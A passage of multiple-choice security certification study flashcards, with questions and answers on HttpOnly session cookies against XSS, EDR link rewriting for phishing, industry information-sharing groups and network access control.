C. Applying a secure attribute on session cookies

D. Utilizing transport layer encryption on all requests

E. Implementing session cookies with the HttpOnly flag

A

E. Implementing session cookies with the HttpOnly flag

HttpOnly keeps the cookie out of document.cookie, so script injected by an XSS attack cannot read the session identifier and send it elsewhere. Length and entropy defend against guessing, and the Secure attribute and TLS defend against interception on the wire; none of them helps once the attacker’s script is running in the victim’s page.

48
Q

The Chief Executive Officer (CEO) of a large insurance company has reported phishing emails that contain malicious links are targeting the entire organization. Which of the following actions would work BEST to prevent against this type of attack?

A. Turn on full behavioral analysis to avert an infection.

B. Implement an EDR mail module that will rewrite and analyze email links.

C. Reconfigure the EDR solution to perform real-time scanning of all files.

D. Ensure EDR signatures are updated every day to avert infection.

E. Modify the EDR solution to use heuristic analysis techniques for malware.

A

B. Implement an EDR mail module that will rewrite and analyze email links.

49
Q

Which of the following sources would a security analyst rely on to provide relevant and timely threat information concerning the financial services industry?

A. Real-time and automated firewall rules subscriptions

B. Open-source intelligence, such as social media and blogs

C. Information sharing and analysis membership

D. Common vulnerability and exposure bulletins

A

C. Information sharing and analysis membership

50
Q

The Chief Information Officer (CIO) for a large manufacturing organization has noticed a significant number of unknown devices with possible malware infections are on the organization’s corporate network. Which of the following would work BEST to prevent the issue?

A. Reconfigure the NAC solution to prevent access based on a full device profile and ensure antivirus is installed.

B. Segment the network to isolate all systems that contain highly sensitive information, such as intellectual property.

C. Implement certificate validation on the VPN to ensure only employees with the certificate can access the company network.

D. Update the antivirus configuration to enable behavioral and real-time analysis on all systems within the network.

A

A. Reconfigure the NAC solution to prevent access based on a full device profile and ensure antivirus is installed.
